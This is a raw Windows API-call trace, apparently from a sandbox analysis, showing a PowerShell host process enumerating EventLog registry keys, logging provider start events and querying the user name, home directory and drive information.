	[0819.377] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.377] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.377] CoTaskMemFree (pv=0x356120) 
	[0819.377] CoTaskMemFree (pv=0x0) 
	[0819.377] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x350) returned 0x0
	[0819.377] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.407] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x378) returned 0x0
	[0820.408] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.408] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x37c) returned 0x0
	[0820.408] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.408] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x380) returned 0x0
	[0820.408] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.408] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x384) returned 0x0
	[0820.408] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.408] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x388) returned 0x0
	[0820.408] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.409] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x38c) returned 0x0
	[0820.409] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.409] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x390) returned 0x0
	[0820.409] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0820.409] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x394) returned 0x0
	[0820.409] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x398) returned 0x0
	[0820.409] RegCloseKey (hKey=0x398) returned 0x0
	[0820.410] RegCloseKey (hKey=0x374) returned 0x0
	[0820.410] RegCloseKey (hKey=0x394) returned 0x0
	[0820.411] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x394) returned 0x0
	[0820.411] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad28c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad288, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad28c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad288*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.411] CoTaskMemFree (pv=0x0) 
	[0820.411] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.411] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.411] CoTaskMemFree (pv=0x356120) 
	[0820.411] CoTaskMemFree (pv=0x0) 
	[0820.411] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.411] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.412] CoTaskMemFree (pv=0x356120) 
	[0820.412] CoTaskMemFree (pv=0x0) 
	[0820.412] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.412] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.412] CoTaskMemFree (pv=0x356120) 
	[0820.412] CoTaskMemFree (pv=0x0) 
	[0820.412] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.412] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.412] CoTaskMemFree (pv=0x356120) 
	[0820.412] CoTaskMemFree (pv=0x0) 
	[0820.412] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.412] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.412] CoTaskMemFree (pv=0x356120) 
	[0820.412] CoTaskMemFree (pv=0x0) 
	[0820.412] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.412] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.413] CoTaskMemFree (pv=0x356120) 
	[0820.413] CoTaskMemFree (pv=0x0) 
	[0820.413] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.413] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.413] CoTaskMemFree (pv=0x356120) 
	[0820.413] CoTaskMemFree (pv=0x0) 
	[0820.413] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.413] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.413] CoTaskMemFree (pv=0x356120) 
	[0820.413] CoTaskMemFree (pv=0x0) 
	[0820.413] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0820.413] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x356120, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.413] CoTaskMemFree (pv=0x356120) 
	[0820.413] CoTaskMemFree (pv=0x0) 
	[0820.413] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x374) returned 0x0
	[0820.414] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.414] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x398) returned 0x0
	[0820.414] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.414] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x39c) returned 0x0
	[0820.414] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.414] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x3a0) returned 0x0
	[0820.414] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.414] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x3a4) returned 0x0
	[0820.415] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.415] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x3a8) returned 0x0
	[0820.415] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.415] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x3ac) returned 0x0
	[0820.415] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.415] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x3b0) returned 0x0
	[0820.415] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x0) returned 0x2
	[0820.415] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x3b4) returned 0x0
	[0820.416] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x3b8) returned 0x0
	[0820.416] RegCloseKey (hKey=0x3b8) returned 0x0
	[0820.416] RegCloseKey (hKey=0x394) returned 0x0
	[0820.416] RegCloseKey (hKey=0x3b4) returned 0x0
	[0820.423] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b910008
	[0822.440] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x358b340*="WSMan", lpRawData=0x358b0b0) returned 1
	[0824.958] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0824.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0824.958] CoTaskMemFree (pv=0x3cbb20) 
	[0824.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.961] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
	[0824.961] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0824.961] CoTaskMemFree (pv=0x1b836b20) 
	[0824.961] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0824.961] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0824.961] CoTaskMemFree (pv=0x356120) 
	[0824.962] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3590878*="Alias", lpRawData=0x3590608) returned 1
	[0824.969] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0824.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0824.969] CoTaskMemFree (pv=0x3cbb20) 
	[0824.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.971] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
	[0824.971] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0824.972] CoTaskMemFree (pv=0x1b836b20) 
	[0824.972] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0824.972] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0824.972] CoTaskMemFree (pv=0x356120) 
	[0824.973] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3595e70*="Environment", lpRawData=0x3595c00) returned 1
	[0824.979] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0824.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0824.979] CoTaskMemFree (pv=0x3cbb20) 
	[0824.980] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0824.981] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0824.981] CoTaskMemFree (pv=0x3cbb20) 
	[0824.981] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0824.981] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0824.981] CoTaskMemFree (pv=0x3cbb20) 
	[0824.981] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ad1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0824.981] SetErrorMode (uMode=0x1) returned 0x1
	[0824.982] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad3c0 | out: lpFileInformation=0x1ad3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0824.982] SetErrorMode (uMode=0x1) returned 0x1
	[0824.983] GetLogicalDrives () returned 0x4
	[0824.983] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0824.985] SetErrorMode (uMode=0x1) returned 0x1
	[0824.986] CoTaskMemAlloc (cb=0x68) returned 0x3c6af0
	[0824.986] CoTaskMemAlloc (cb=0x68) returned 0x1b8265c0
	[0824.986] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3c6af0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ad390, lpMaximumComponentLength=0x1ad38c, lpFileSystemFlags=0x1ad388, lpFileSystemNameBuffer=0x1b8265c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ad390*=0x9c354b42, lpMaximumComponentLength=0x1ad38c*=0xff, lpFileSystemFlags=0x1ad388*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0824.986] CoTaskMemFree (pv=0x3c6af0) 
	[0824.986] CoTaskMemFree (pv=0x1b8265c0) 
	[0824.986] SetErrorMode (uMode=0x1) returned 0x1
	[0824.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0824.988] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.988] SetErrorMode (uMode=0x1) returned 0x1
	[0824.988] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad330 | out: lpFileInformation=0x1ad330*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0824.988] SetErrorMode (uMode=0x1) returned 0x1
	[0824.988] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.988] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.988] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0824.989] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1aceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.989] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0824.990] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.990] SetErrorMode (uMode=0x1) returned 0x1
	[0824.990] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad160 | out: lpFileInformation=0x1ad160*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0824.990] SetErrorMode (uMode=0x1) returned 0x1
	[0824.990] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.990] SetErrorMode (uMode=0x1) returned 0x1
	[0824.990] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad160 | out: lpFileInformation=0x1ad160*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0824.991] SetErrorMode (uMode=0x1) returned 0x1
	[0824.991] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0824.991] SetErrorMode (uMode=0x1) returned 0x1
	[0824.991] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad200 | out: lpFileInformation=0x1ad200*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0824.991] SetErrorMode (uMode=0x1) returned 0x1
	[0824.991] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
	[0824.992] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0824.992] CoTaskMemFree (pv=0x1b836b20) 
	[0824.992] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0824.992] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0824.992] CoTaskMemFree (pv=0x356120) 
	[0824.993] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x359cf60*="FileSystem", lpRawData=0x359ccf0) returned 1
	[0825.009] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0825.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0825.010] CoTaskMemFree (pv=0x3cbb20) 
	[0825.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0825.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0825.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0825.012] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
